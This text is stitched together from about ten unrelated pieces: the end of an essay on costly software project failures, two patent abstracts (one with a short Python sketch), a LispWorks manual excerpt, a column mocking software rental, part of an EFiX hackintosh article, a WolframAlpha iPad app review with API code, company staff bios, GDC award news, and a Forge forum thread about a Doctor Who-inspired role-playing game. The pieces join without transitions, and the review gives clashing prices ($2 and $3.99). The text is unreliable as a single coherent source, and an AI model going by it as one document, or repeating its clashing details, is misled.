Immature IT practices doomed the U.S. Internal Revenue Service's $4 billion modernization effort in 1997, and they have continued to plague the IRS's current $8 billion modernization. It may just be intrinsically impossible to translate the tax code into software code--tax law is complex and based on often-vague legislation, and it changes all the time. From an IT developer's standpoint, it's a requirements nightmare. But the IRS hasn't been helped by open hostility between in-house and outside programmers, a laughable underestimation of the work involved, and many other bad practices.
THE PILOT'S ACTIONS JUST BEFORE a plane crashes are always of great interest to investigators. That's because the pilot is the ultimate decision-maker, responsible for the safe operation of the craft. Similarly, project managers play a crucial role in software projects and can be a major source of errors that lead to failure.
Back in 1986, the London Stock Exchange decided to automate its system for settling stock transactions. Seven years later, after spending $600 million, it scrapped the Taurus system's development, not only because the design was excessively complex and cumbersome but also because the management of the project was, to use the word of one of its own senior managers, "delusional." As investigations revealed, no one seemed to want to know the true status of the project, even as more and more problems appeared, deadlines were missed, and costs soared [see box, "Case Study #3"].
The most important function of the IT project manager is to allocate resources to various activities. Beyond that, the project manager is responsible for project planning and estimation, control, organization, contract management, quality management, risk management, communications, and human resource management.
Bad decisions by project managers are probably the single greatest cause of software failures today. Poor technical management, by contrast, can lead to technical errors, but those can generally be isolated and fixed. However, a bad project management decision--such as hiring too few programmers or picking the wrong type of contract--can wreak havoc. For example, the developers of the doomed travel reservation system claim that they were hobbled in part by the use of a fixed-price contract. Such a contract assumes that the work will be routine; the reservation system turned out to be anything but.
Project management decisions are often tricky precisely because they involve tradeoffs based on fuzzy or incomplete knowledge. Estimating how much an IT project will cost and how long it will take is as much art as science. The larger or more novel the project, the less accurate the estimates. It's a running joke in the industry that IT project estimates are at best within 25 percent of their true value 75 percent of the time.
There are other ways that poor project management can hasten a software project's demise. A study by the Project Management Institute, in Newton Square, Pa., showed that risk management is the least practiced of all project management disciplines across all industry sectors, and nowhere is it more infrequently applied than in the IT industry. Without effective risk management, software developers have little insight into what may go wrong, why it may go wrong, and what can be done to eliminate or mitigate the risks. Nor is there a way to determine what risks are acceptable, in turn making project decisions regarding tradeoffs almost impossible.
Poor project management takes many other forms, including bad communication, which creates an inhospitable atmosphere that increases turnover; not investing in staff training; and not reviewing the project's progress at regular intervals. Any of these can help derail a software project.
The last area that investigators look into after a plane crash is the organizational environment. Does the airline have a strong safety culture, or does it emphasize meeting the flight schedule above all? In IT projects, an organization that values openness, honesty, communication, and collaboration is more apt to find and resolve mistakes early enough that rework doesn't become overwhelming.
If there's a theme that runs through the tortured history of bad software, it's a failure to confront reality. On numerous occasions, the U.S. Department of Justice's inspector general, an outside panel of experts, and others told the head of the FBI that the VCF system was impossible as defined, and yet the project continued anyway. The same attitudes existed among those responsible for the travel reservation system, the London Stock Exchange's Taurus system, and the FAA's air-traffic-control project--all indicative of organizational cultures driven by fear and arrogance.
A recent report by the National Audit Office in the UK found numerous cases of government IT projects' being recommended not to go forward yet continuing anyway. The UK even has a government department charged with preventing IT failures, but as the report noted, more than half of the agencies the department oversees routinely ignore its advice. I call this type of behavior irrational project escalation--the inability to stop a project even after it's obvious that the likelihood of success is rapidly approaching zero. Sadly, such behavior is in no way unique.
In the final analysis, big software failures tend to resemble the worst conceivable airplane crash, where the pilot was inexperienced but exceedingly rash, flew into an ice storm in an untested aircraft, and worked for an airline that gave lip service to safety while cutting back on training and maintenance. If you read the investigator's report afterward, you'd be shaking your head and asking, "Wasn't such a crash inevitable?"
So, too, the reasons that software projects fail are well known and have been amply documented in countless articles, reports, and books [see sidebar, To Probe Further]. And yet, failures, near-failures, and plain old bad software continue to plague us, while practices known to avert mistakes are shunned. It would appear that getting quality software on time and within budget is not an urgent priority at most organizations.
It didn't seem to be at Oxford Health Plans Inc., in Trumbull, Conn., in 1997. The company's automated billing system was vital to its bottom line, and yet senior managers there were more interested in expanding Oxford's business than in ensuring that its billing system could meet its current needs [see box, "Case Study #1"]. Even as problems arose, such as invoices' being sent out months late, managers paid little attention. When the billing system effectively collapsed, the company lost tens of millions of dollars, and its stock dropped from $68 to $26 per share in one day, wiping out $3.4 billion in corporate value. Shareholders brought lawsuits, and several government agencies investigated the company, which was eventually fined $3 million for regulatory violations.
Even organizations that get burned by bad software experiences seem unable or unwilling to learn from their mistakes. In a 2000 report, the U.S. Defense Science Board, an advisory body to the Department of Defense, noted that various studies commissioned by the DOD had made 134 recommendations for improving its software development, but only 21 of those recommendations had been acted on. The other 113 were still valid, the board noted, but were being ignored, even as the DOD complained about the poor state of defense software development!
Some organizations do care about software quality, as the experience of the software development firm Praxis High Integrity Systems, in Bath, England, proves. Praxis demands that its customers be committed to the project, not only financially, but as active participants in the IT system's creation. The company also spends a tremendous amount of time understanding and defining the customer's requirements, and it challenges customers to explain what they want and why. Before a single line of code is written, both the customer and Praxis agree on what is desired, what is feasible, and what risks are involved, given the available resources.
After that, Praxis applies a rigorous development approach that limits the number of errors. One of the great advantages of this model is that it filters out the many would-be clients unwilling to accept the responsibility of articulating their IT requirements and spending the time and money to implement them properly. [See "The Exterminators," in this issue.]
Some level of software failure will always be with us. Indeed, we need true failures--as opposed to avoidable blunders--to keep making technical and economic progress. But too many of the failures that occur today are avoidable. And as our society comes to rely on IT systems that are ever larger, more integrated, and more expensive, the cost of failure may become disastrously high.
Even now, it's possible to take bets on where the next great software debacle will occur. One of my leading candidates is the IT systems that will result from the U.S. government's American Health Information Community, a public-private collaboration that seeks to define data standards for electronic medical records. The idea is that once standards are defined, IT systems will be built to let medical professionals across the country enter patient records digitally, giving doctors, hospitals, insurers, and other health-care specialists instant access to a patient's complete medical history. Health-care experts believe such a system of systems will improve patient care, cut costs by an estimated $78 billion per year, and reduce medical errors, saving tens of thousands of lives.
But this approach is a mere pipe dream if software practices and failure rates remain as they are today. Even by the most optimistic estimates, to create an electronic medical record system will require 10 years of effort, $320 billion in development costs, and $20 billion per year in operating expenses--assuming that there are no failures, overruns, schedule slips, security issues, or shoddy software. This is hardly a realistic scenario, especially because most IT experts consider the medical community to be the least computer-savvy of all professional enterprises.
Patients and taxpayers will ultimately pay the price for the development, or the failure, of boondoggles like this. Given today's IT practices, failure is a distinct possibility, and it would be a loss of unprecedented magnitude. But then, countries throughout the world are contemplating or already at work on many initiatives of similar size and impact--in aviation, national security, and the military, among other arenas.
Like electricity, water, transportation, and other critical parts of our infrastructure, IT is fast becoming intrinsic to our daily existence. In a few decades, a large-scale IT failure will become more than just an expensive inconvenience: it will put our way of life at risk. In the absence of the kind of industrywide changes that will mitigate software failures, how much of our future are we willing to gamble on these enormously costly and complex systems?
We already know how to do software well. It may finally be time to act on what we know.
Robert N. Charette is president of ITABHI Corp., a risk-management consultancy in Spotsylvania, Va. An IEEE member, he is the author of several books on risk management and chair of the ISO/IEEE committee revising the 16085 standard on software and systems engineering risk management.
A technique and mechanism for efficiently searching across multiple versions of a resource is provided. New operators are provided that take into account the versions of a particular resource. The query engine evaluates the new operators using either an index-based approach or a functional approach. Under an index-based implementation, a hierarchical index is traversed to find a particular resource (or resources) associated with a specified path and the version history identifier associated with the particular resource(s). A version history table containing references to all versions of the particular resource(s) is then obtained. Under the functional implementation, a link table, which contains all paths in a user's workspace, is examined to determine whether the version history identifier of a particular resource matches a version history identifier of a resource specified in the link table and whether the path to the resource in the link table is related to the path specified.
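Stripped of the patent language, the functional (link-table) approach amounts to something like the following sketch; all names here are invented for illustration:

    from collections import namedtuple

    Link = namedtuple("Link", "path vh_id")   # one row per path in the workspace

    def is_related(candidate, base):
        # path match or descendant of the specified path
        return candidate == base or candidate.startswith(base.rstrip("/") + "/")

    def versions_under_path(base, link_table, version_history):
        """Scan the link table for related paths, then expand each match
        through its version-history identifier, which references every
        version of that resource."""
        hits = []
        for link in link_table:
            if is_related(link.path, base):
                hits.extend(version_history[link.vh_id])
        return hits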
25.3.2 Editing source code
While the Stepper is running, it displays a read-only copy of the source in the source area. Therefore, you cannot edit the code in the source area, other than when the status is "Enter a form to step in the pane above".
If you step a function for which the source has been edited since it was compiled, then the Stepper uses a copy of the compile-time source, not the edited source. This copy is stepped in a new editor buffer created specially for it and this is displayed in the source area.
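Concretely, as a minimal sketch: compile a function, step a call to it, and then edit the definition; the Stepper keeps showing the compile-time copy.

    ;; Compile a function, then enter a form to step in the Stepper:
    (defun scale (x) (* x 10))
    (scale 4)        ; step this form
    ;; Editing SCALE's source in the editor now has no effect on the
    ;; Stepper's display: it shows a read-only copy of the source as
    ;; it was when SCALE was compiled.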
Common LispWorks User Guide (Windows version) - 5 Jul 2006
Another Crock, Headed Your Way
Software rental over the Internet, and why it'll never work.
During the dot-com boom, a lot of crackpot ideas appeared on the scene, including the notion that the Internet would be the conduit for software applications. Users would rent software on an as-needed basis rather than buying shrink-wrapped packages or expensive licenses for elaborate systems. This idea was as crazy when it was first proposed as it is today, but it continues to gain momentumat least among idealists who see it as a path to profits.
Microsoft is the surprise player: a company that once put the "service-based" model for software distribution on its enemy list. What changed? I believe that the entire concept is part of the groupthink mentality that plagues Microsoft and results in a tremendous waste of resources and misplaced focus.
Show me the money. Here are some of the problems with the software rental model. First of all, at the base of the model, you need to have a report, a spreadsheet, or an indication that this concept of software distribution will result in more profits than the shrink-wrapped model. Otherwise, what's the point? At the same time, you must provide some evidence that people will prefer the new model to the old. And finally, you need a valid argument to convince corporate America that the new model will somehow save people time and money.
All three of these elements have to be in play and workable for software rental to get traction. Unfortunately, either software companies will have to realize less revenue using the rental-services model or corporate America will have to be bamboozled into embracing the idea and lose money on the deal. There is no way of getting around the dilemma. In this column, I'm not even going to bother discussing the viability of using the too often flaky Internet to deliver such services.
And note that the second requirement, which is that people can be cajoled into liking the basic idea, is also problematic. I mean, once I own a copy of Microsoft Office, does the company expect me to rent another? What about the huge installed base of users who have already paid the full-ticket price for the product?
Proof that this is going nowhere. Recently IBM, Microsoft, Oracle, SAP, and a host of other companies launched a new standards group called the Web Services Interoperability Organization (WS-I, www.ws-i.org). Oddly, there are hardware companies in this group, including Fujitsu, Hewlett-Packard, and Intel. The idea is to have a lot of meetings and create open standards for software-service schemes.
You always know that something is amiss when consortiums such as this form. It means there is no clear leader to tell people what to do. The clear-leader phenomenon is more common when a high-tech paradigm shift actually takes place. This Web-service stuff is purely wishful thinking, which is how what amounts to a drinking club forms, in hopes that something good comes of it. Nobody knows what the heck is really going on.
This group reminds me in some strange way of another drinking club, the Sun-inspired Liberty Alliance Project (www.projectliberty.org), which, curiously, has a lot of crossover ("we go both ways") companies such as Hewlett-Packard. Whether Microsoft .NET or Sun ONE, these ideas are making everybody scratch their heads. Some may nod knowingly, but in fact, there is no "there" there. Companies join the drinking clubs just in case, in fear that they may miss out. The drinking club itself becomes news and feeds the momentum, showing that there is hot activity, and golly, look at all those big names!
A lot of hot air. The giveaway that the Web-based distribution model is nothing but hot air with limited momentum and hardly any energy is the laundry list of drinking-club members. The Liberty Alliance is the best example of celebrity bloat. Look at its membership list: Global Crossing (ha!), Bell Canada, United Airlines, American Express, Sony, and NTT DoCoMo. What do these guys have to do with anything? This list of participants (née founders!) reads like one of those strategic-partners press releases that used to be so popular a decade ago. It's a "let's see which of our buddies we can line up to convince the rubes that we are up to something important" list. But it's not fooling anyone.
Face it, the Web services model is a throwback to the dot-com era and has nothing going for it. Waste your time on it at your own risk. You've been warned.
Once the operating system is installed on the hard drive, reboot into the Bios and turn AHCI on. Among other effects, this allows the boot mechanism to find Sata drives beyond the IDE range of 0-3. EFiX can now act as a boot selector, allowing you to boot between, say, Windows, Linux and Mac OS X, provided each is installed on a separate physical drive.
The EFiX boot screen. It's found five drives: the left-most is Linux-bootable, then two Apple-bootable. The next is unbootable and the fifth is a Windows-bootable drive. The current boot (selected with the cursor keys) is the central highlighted icon, and the small rectangles above it represent the countdown.
I probably need to correct any impression that EFI is open-ended and wholly wonderful. An alternative view is set out here, where it's argued that EFI is effectively a DRM'd Bios.
ASEM itself takes advantage of the fact that "a core value of EFI is the preservation of intellectual property", and appears to be near-paranoid that its development effort will be stolen by others, making full use of EFI's support for cryptography to obscure its code and prevent interception of its updates.
Would-be hackers are not the only losers here. Ordinary EFiX users have complained that the one-way, over-the-net update process offers no option to step back to a previous update if, as actually happened earlier this year, an EFiX firmware update negatively impacts (in this case, network) performance.
But is it Legal?
There's plenty of room for discussion here. ASEM maintains that it's using an open standard, has developed its proprietary extension software in-house and is in breach of no copyright or patents. It sees the EFiX as broadening Apple's market, helping sales of Leopard into the built-it-yourself gaming sector, hitherto almost exclusively the domain of Windows.
Success: Retail Leopard installing
However, a clause in Leopard's End User Licence Agreement (EULA), which everyone installing Leopard is supposed to read and accept, says: "This Licence allows you to install, use and run one (1) copy of the Apple Software on a single Apple-labeled computer at a time. You agree not to install, use or run the Apple Software on any non-Apple-labeled computer, or to enable others to do so."
WolframAlpha: The Answer To All Your Questions
Nathan Simpson on November 30th 2012
Since its release in 2009, WolframAlpha has become very popular. Based on Mathematica, the computational platform written by British scientist Stephen Wolfram in 1988, WolframAlpha is capable of interpreting and answering basic questions such as, "How old was FDR in 1942?" and "What is the distance between the north pole and the south pole?"
A service like this is already accessible to iPad users via the website; however, the app provides a much simpler and more convenient approach to solving all your problems. With the price drop putting it from $50 to $2, do we have a bargain on our hands?
The WolframAlpha System
WolframAlpha delivers facts and aims to inform. Vague questions such as "Was Michael Jordan present in the NBA Playoffs this year?" and "Which shirt will I wear today?" result in a failed interpretation: you'll usually get an answer different from the one you wanted, or none at all.
Another thing about the search engine is that questions have to be phrased correctly in order for them to be interpreted as such. My earlier example asked, "What is the distance between the north pole and the south pole?", and the important thing is that it's written so the meaning is completely clear. Try the same question phrased as "What is the distance between the north and the south pole?" and you will get no relevant response. The difference is almost negligible when writing, but it's crucial that you phrase questions correctly if you want the answer to be correct, too.
The questions you input don’t really have to be questions at all; you can strip away connectives and little details so that our earlier question is reduced to this: “distance north pole south pole,” and the answer will be correct. As long as the fundamentals of the question are there, the interpretation and therefore the answer will be the right one.
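(As an aside for the curious: the same interpretation engine is also exposed through WolframAlpha's developer query API, which is separate from the app but handy for experimenting with phrasing. The sketch below is just a rough illustration; the AppID is a placeholder you'd obtain from Wolfram, and the exact pod layout varies by query.)

```python
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

APP_ID = "YOUR-APPID"  # placeholder; requires a free developer AppID

def ask(question: str) -> str:
    """Send a question to the WolframAlpha query API and return the
    plaintext of the primary result pod, if any."""
    url = "http://api.wolframalpha.com/v2/query?" + urllib.parse.urlencode(
        {"appid": APP_ID, "input": question, "format": "plaintext"}
    )
    with urllib.request.urlopen(url) as response:
        root = ET.fromstring(response.read())
    # Each answer arrives as a "pod"; the one flagged primary holds the result.
    for pod in root.iter("pod"):
        if pod.get("primary") == "true":
            return pod.findtext("./subpod/plaintext") or ""
    return "(no interpretation)"

# Tiny phrasing changes can decide whether a query is interpreted at all.
print(ask("distance north pole south pole"))
print(ask("What is the distance between the north and the south pole?"))
```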
The app employs a semi-minimalist approach in the way that it’s designed. It only has a single main screen predominantly taken up by the search bar and results from your search to the right. On the left is a useful array of features that includes your search history, favorite searches, about the app/company and even example searches to start you off.
The display upon startup
Stephen Wolfram's Mathematica has the underlying principle that any simple input can produce complex results, much as single-celled organisms eventually developed into the intricate and perplexing life that surrounds and encompasses us today. This principle is clearly evident in WolframAlpha. Some of the example searches show off WolframAlpha's diversity and power as a search engine, from simple inputs like a birthday or a name to the most complex of mathematical equations; this app is unparalleled in terms of sheer information.
Fourier transformations at work.
Example searches are categorized into different fields, like Culture and Media, Colors and Transportation. Each offers an insight into the vast wealth of knowledge the app has at its disposal. I've found the search engine to be invaluable when researching topics for a report, or just to look up meaningless facts and statistics merely for amusement.
There’s a wealth of example searches in the categories to the left.
Search History can also be a useful function, as you may have forgotten previous entries whose results could be of use again. It's not the best function in the world, but useful nonetheless. Equally useful is the Favorites function. Tap the Share button in the top right of the display, click Add to Favorites and your search will display in the corresponding tab on the left.
The Greek letter ‘Xi’
One of the highlights of this app for me is the custom keyboard. Characters previously available through the 123 button are displayed on an annex of the standard keyboard along with other keys that can be of use whilst performing searches. Even if there’s a character you’ve never seen before, input it by itself into the search engine and you will get to know what it’s for.
Why Not Just Use the Website?
The thing is, you can. It works soundly in Safari and is free of charge. What I’ve found though is that the app is a lot more organized; you don’t have to jump from screen to screen to get categories and results because all the content is on that single home page. It certainly is a lot more convenient.
The app is designed for the iPad, so it would make sense that the app is far easier to use than the website. It looks better, too; while it’s not the most amazing UI in the world, it fits perfectly with the theme of other default apps and is semi-minimalistic in the way it’s designed.
The most attractive reason to use the app over the website, in my opinion, is the custom keyboard. It's extremely convenient to have all the mathematical and Greek symbols available when performing complex calculations that would otherwise be impossible; doing this on the website requires a lengthy process of copying and pasting from other websites. This is a concept I think other apps should adopt as well, as it really enhances the user experience.
Overall, you can see that the app has lots of things going for it, but none that warrant a $50 price tag, as WolframAlpha has clearly made note. With the new, far more reasonable price of $3.99, the app becomes a cheap and easy to use outlet for your mind to wander and explore the mysteries of life. It’s definitely worth a purchase if you use the search engine at all.
A cheap way to access all the perks of the WolframAlpha search engine in a stylish and organized manner.
WolframAlpha | $3.99 | WolframAlpha
Dimofinf Management
Dimofinf has the best management team, one that contributes to the development of the company and raises its performance to provide better service to our clients and to keep up with the technological advancements that improve our Arabic hosting services, servers, content management software and web development.
Mohammad Alkhayat Founder and GM
Mohammad Alkhayat is the founder of Dimofinf and was the first to introduce programming and design services in 1998 when he founded Dimofinf. He has developed several unique software programs and applications for many major websites. He also enjoys a significant experience in the field of management and a wide-ranging technical expertise in programming (using several programming languages), different web applications and server environments of different technologies. He manages the company’s general and major policies and strategic plans, he also gives directions with regards to how to accomplish these plans.
Youssef Nosshy Operations Office Manager
Youssef Nosshy has been working in the IT field since 2006 and has significant technical experience in it. He joined our team at the beginning of 2011, first serving as an employee in the technical support division, then as its head, then as Vice Executive Director for Technical Affairs. In 2013 he became Business Development Manager, and in 2015 he became Operations Office Manager.
Ramy Allam CTO
Mr. Allam joined Dimofinf in 2010. He first served as an employee in our hosting division, then as its vice head, then as its head, and finally as chief technical officer. Since 2005, he has been involved in operating systems management, open-source software applications and web development. He works according to a set of clear objectives and standards established to guarantee the best possible performance and service to clients subscribed to our different hosting packages. His responsibilities include the continuous development and improvement of the hosting division and supervising its daily operations, ensuring the outcome is always up to our high standards and our clients' expectations.
Mustafa Albazy Head of Hosting
Mustafa Albazy, from the United Kingdom, is specialized in operating systems and information security, with a great deal of community research and development in these fields. Mustafa joined Dimofinf in early 2008 in hosting technical support and has since been promoted to different positions within the company, the most recent being his current position as Head of the Hosting Department. Mustafa is responsible for providing the highest web hosting quality, from the hardware/software base to customer service and uptime results.
Madeleine Essam HR Manager
Madeleine joined Dimofinf at the beginning of 2013. She holds the position of Human Resources and Administrative Affairs Manager and has vast experience in those fields. Madeleine is responsible for staffing all departments, following up on work schedules, policies and leave, as well as addressing all company needs.
Joseph Botros Customer Service Manager
Joseph Botros joined Dimofinf in the second half of 2012 as a customer service employee. After some time, he was promoted to Team Leader, and by the end of 2013 he was given responsibility for the department when he was promoted to Customer Service Manager. Joseph possesses wide experience in the customer service field, technical skill in dealing with all content management programs, and an excellent marketing vision, which allows him to stay up to date with clients' technical requirements and to consistently provide service in the best manner.
Mahran Elneel Programming Department Manager
Mahran started working at Dimofinf in 2012 as a PHP programmer on the programming team. His technical skills developed during his time at Dimofinf across several languages, including PHP, XML, JS and CSS. This experience helped him develop the infrastructure for Dimofinf's software and fulfil clients' needs. Mahran became Programming Department Manager in 2014 and manages the programming team around the requirements of Dimofinf's clients, with the aim of completely meeting their needs and demands.
Hadeel Barakat Projects Manager
A web geek, Hadeel graduated from the Faculty of Engineering, Computers and Systems Department, then started her career as a web developer. She joined Dimofinf in the second half of 2013. Hadeel is innovative, creative and a challenge-taker with real dedication to her work; she also has good awareness of different web technologies, and her skills have enabled her to compete in the market.
Ahmed Fahmy Digital Marketing Manager
Ahmed Fahmy joined Dimofinf in 2014. Since then, he has supported the company's marketing department and restructured it on strong scientific foundations, forming a strong, inclusive team that has built a solid infrastructure and several successful marketing plans to reinforce the company's trademark and make it a stronger competitor internationally. He works through well-studied plans and methods, the latest advancements in electronic marketing and search engine compatibility, and the targeting of new clients, and he has begun setting a future marketing plan to execute with the help of his team so that Dimofinf will always be in the lead.
Anita Sarkeesian, Riot co-founders win GDCA 2014 Special Awards

The 14th Annual Game Developers Choice Awards organizers have revealed the two final Special Award winners for this year. The Ambassador Award, honoring someone who is helping video games "advance to a better place" through advocacy or action, is going to media critic Anita Sarkeesian, creator of Feminist Frequency, a video series that deconstructs representations of women in game and pop culture narratives. The Pioneer Award, honoring a breakthrough tech and gameplay design milestone, will go to Brandon Beck and Marc Merrill, the co-founders of Riot Games.
Ambassador Award winner Sarkeesian, whose honor was bestowed after open nominations from the game development community and voting by the Game Developers Choice Advisory Committee, has explored the representation of women in pop culture, with a particular focus on representation within the medium of video games. In her work Anita Sarkeesian has deconstructed the stereotypes, patterns and tropes associated with women in popular culture, and highlighted issues surrounding the targeted harassment of women in online and gaming spaces. In doing so, Sarkeesian has herself been subjected to harsh reactions ranging from epithets to misogynistic threats of violence. This online harassment did nothing to stifle the success of her Kickstarter campaign to fund the creation of the "Tropes vs. Women in Video Games" online video series, which quickly reached -- then exceeded -- its funding goal.

Pioneer Award winners Brandon Beck and Marc Merrill are the minds behind League of Legends, a game that is played by more than 27 million players every day and by more than 67 million players every month. The duo created Riot Games with the mission to be the most player-focused company in the world, and the Pioneer award is built upon the Staples Center-sized growth of eSports by the company. Riot's community outreach and support initiatives have earned League of Legends a remarkable level of commitment from players, who regularly spend more than a billion hours a month in the game as of March 2013. As President of Riot Games, Merrill has led development, publishing, and live operations on League of Legends, while Beck drives Riot's strategy and creative vision as CEO.

Finally, as part of the awards evening that includes both the Independent Games Festival and Game Developers Choice Awards, the team behind the Hey Ash Whatcha Playin'? video series, Ashley and Anthony Burch, will contribute brand-new videos to the Independent Games Festival this year. They augment the efforts of ceremony favorites, the video game sketch anarchists Mega64, who are returning to make videos for the Game Developers Choice Awards this year.

The Game Developers Choice Awards are produced in association with GDC. The awards ceremony will take place on Wednesday, March 19, 2014 at 6:30 pm at the San Francisco Moscone Center and is open to all GDC attendees. As previously announced, the Game Developers Choice Awards ceremony will be hosted by Respawn Entertainment's community manager, Abbie Heppe, also the voice of Sarah in Respawn's upcoming Titanfall, and will be immediately preceded by the Independent Games Festival Awards hosted by Capy president and co-founder Nathan Vella. More information about the 14th Annual Game Developers Choice Awards can be found on the official website.
Gamasutra and GDC are sibling organizations under parent UBM Tech
Posted by Staff on February 11, 2014 9:00 AM
An input device for interfacing with a computing device is provided. The input device includes a body configured to be held within a human hand. The input device includes a light emitting diode (LED) affixed to the body and a power supply for the LED. A mode change activator is integrated into the body, where the mode change activator is configured to cause a change of a color of a light originating from the LED. The color change is capable of being detected to cause a mode change at the computing device. Methods for detecting input commands from an input source within a field of sight of an image capture device, and a computing system which includes the input device are provided.
The Forge Forums: Last Chance Game Chef
Topic: Untitled DrWho Project (Read 2439 times)
Dan Maruschak
Untitled DrWho Project
My four threads are:
- [Kissanil] Answers to Power 19
- Character Creation placement
- Chrono Master?
- [BSU] "Blowing Stuff Up" - Basic Draft

I was already leaning towards something Doctor Who-related once I saw the ingredients Doctor and Chrono Master?. In the [Kissanil] thread, there's this quote: "It's about strong dilemas like 'If I could drain the sun's energy to save my lover's soul, should I do it?'" That could easily be the theme of a Doctor Who story. And of course there's plenty of mimicry going on in the show: from the obvious, like the TARDIS's chameleon circuit, to the way that the sci-fi elements of the stories will often mimic folklore or history (e.g. aliens that have similarities to vampires, alien cultures that mimic medieval Europe).

I'm a fan of the show (in both the classic and modern incarnations -- I'm most drawn to the Tom Baker era, which was my first exposure, and I feel like the Matt Smith episodes have been a return to "proper" Doctor Who where there's a sense of fun and whimsy mixed in with the sci-fi and adventure). I've been thinking that I should try my hand at creating a good Doctor Who game since I was disappointed by the recent officially licensed Cubicle 7 product (it's basically the traditional "skill rolls vs. GM-set target numbers" chassis with a layer of "only fail when you want to" points poured over it), and it seems like this Game Chef is my opportunity to do that. Since I don't have an official license, I'm going to do a "serial numbers filed off" game. I think this also potentially introduces a fun creative constraint into play (I was never interested in Harry Potter gaming until my imagination was sparked by the "Harry Potter with the serial numbers filed off" game Boarsdraft -- the "similar, but different" effect got my creative juices flowing). Since I'm trying to avoid direct references to the source material I haven't settled on a good title yet (plus I'm pretty bad with titles in general).

I'm probably inclined to make story structure pretty heavily involved in the mechanics -- I don't want to just slap Doctor Who color on something generic, I want to figure out what makes Doctor Who stories special to me and figure out how to get that to happen in a game. That may be too ambitious for a Game Chef game, but I need to follow the idea that's getting me excited (I explored a few alternative ingredient combinations but I didn't feel the fire in my belly to attack them like I do this one). Most Doctor Who stories are generally structured like mysteries where a lot of the story involves just uncovering what's going on, so I'll need to figure out how to wrap the game around that. The concept of "plot as background detail" is something I've been thinking about since I playtested Boarsdraft, so I may try to develop some of my thoughts on that concept in this game, but I'm not sure yet since I haven't figured out what the foreground (i.e. what the players mechanically interact with) would be if I embrace that metaphor.
my blog | my podcast | My game Final Hour of a Storied Age needs playtesters!
mrteapot
Re: Untitled DrWho Project
"Plot as background detail" is a very Doctor Who sort of thing. Lots of Doctor Who stories have this sort of thing going on where they have utterly rejected traditional ideas of what makes a good story. They'll not explain things until the moment that they are relevant rather than foreshadowing it. Or when there is foreshadowing, it is very heavy handed and weird and probably pointing at stuff that won't happen for several more episodes. The stories are mysteries, but not really fair ones. You couldn't really solve the mysteries with the clues provided. These and other aspects are problems according to traditional ideas of a good story, but Doctor Who keeps being engaging because of (not despite) these things.Which all makes for great RPG fodder. All of those things are true of lots of roleplaying game plots, too, especially those made up on the fly. It suggests that the players should be doing something else and "solving the problem" could be done at any time given enough technobabble, provided the players already sorted out the emotional core of the story or whatever the players are doing.It took a fairly large amount of self-control to not make a Doctor who knockoff game for me as well. I already wrote my Doctor Who knockoff last year.
Matthew Sullivan-Barrett
Right on, Dan, I'm glad someone is stepping up to the plate. It had to be done, man, and I'm super excited to see how it comes out.

I always like the Psych 101 episodes, where it's all just a thin metaphor for the human experience, which I recall seeing a lot of in the Tennant era.

Allons-y!
PeterBB
This game sounds relevant to my interests!

I completely agree that "plot as background detail" is true, but I would be careful not to lose the "exploring a fascinating universe" element. The monsters aren't the core of the stories, but they are definitely part of the draw anyway.
Troy_Costisick
I love mystery games, Dan. Dr. Who is a classic, so I hope it goes well for you. I'll just plug one of my favorite games real fast: InSpectres. It is Ghostbusters with the serial numbers filed off. Maybe that can provide some inspiration.

Peace,
Troy
Theory Blog: http://socratesrpg.blogspot.com/Community Site: http://www.rpgcrossroads.com/
Quote from: Troy_Costisick on April 10, 2012, 04:37:40 AM
> I'll just plug one of my favorite games real fast: InSpectres. It is Ghostbusters with the serial numbers filed off. Maybe that can provide some inspiration.

If I were making the game, this would be my starting point as well. But I'm interested in seeing what Dan comes up with.
My current plan is to have the GM prep several things. First, they'll prep the "mystery", which is going to be something along the lines of "what does it look like on the surface?" (e.g. vampires), "what's the sci-fi twist?" (e.g. aliens that need to consume the iron from vertebrate blood), and "what's the crisis?" (e.g. aliens begin conquest of earth). Second, they'll prep a bunch of colorful details about the setting and about the people and aliens involved. Scene-framing will be mostly a player choice, but there will be some procedure during the GM prep that puts a list of elements onto a player-facing list, and players will get some sort of in-game benefit for framing scenes that include that element. The GM's job will be to introduce elements of the mystery and elements of their colorful prep (since not everything the GM introduces will be "plot significant", players won't feel obligated to latch onto every detail the GM throws at them), and the things on the player-facing list will be places or situations that will facilitate the GM doing that job (so the player-facing list might have something like "the theater", and when the player frames a scene at the theater it will make it organic for the GM to introduce the colorful "theater manager" NPC he's created, or the Chinese magician character that's an element of the mystery).

I think play will be broken down into a few phases that have slightly different mechanics. Right now I'm thinking three phases, the beginning, middle, and end. The boundary between the beginning and the middle is the "True Mystery is Revealed" step (e.g. it's not vampires, it's blood-drinking aliens!) and the boundary between the middle and the end is the "Threat is Revealed" step (e.g. we need to stop them before they open a space-bridge to their homeworld and begin their invasion!). In the first two phases players won't be mechanically interacting with the mystery, but doing something else like building relationships or something (this is the part that's still fuzziest for me), risking horror, injury, or danger to the people they know. In the end phase they'll be able to do something directly in the mechanics to avert the crisis. The GM will be limited in what kind of fiction they can introduce. So, for example, in one phase they might be able to do violence to characters off-screen, but they may only be allowed to threaten a befriended character on-screen where a PC has an opportunity to avert it (like I said, this part is still gelling).

I've never played InSpectres, but I'm familiar with it. I think I want to go in more of a GM-prepped "mystery" direction (of the "not fair" type, where basically the story isn't about a character/audience deducing clues, but about following characters as a situation is slowly revealed) rather than an on-the-fly approach. The play of the game won't really be "will they figure it out?", but more about what happens to the characters along the way: are they filled with wonder, horrified, alienated, enlightened, etc.? My main mechanical touchpoint is the playtest I did of Boarsdraft a while back. There were some things I thought were interesting in that game and some places where I thought it needed work. Unfortunately the designer of that game isn't going to take it in the direction I think it needs to go, so I'm trying to go in that direction myself with this game.
It's part of my larger area of interest in the idea of having strongly structured plots as a platform for exploring characters, as opposed to the more common Forge-derived approach of having strongly defined characters which ram into each other to produce emergent plot.
So what would make this game the kind of game you only play once?
The "last chance" theme isn't strongly represented in the design (yet?), although my goal is for each session to map to a single story (i.e. one episode of the modern format, or a 4- or 6-episode arc in the classic half-hour-with-cliffhangers format) and character creation will be very light-weight so it should be playable as a one-shot.
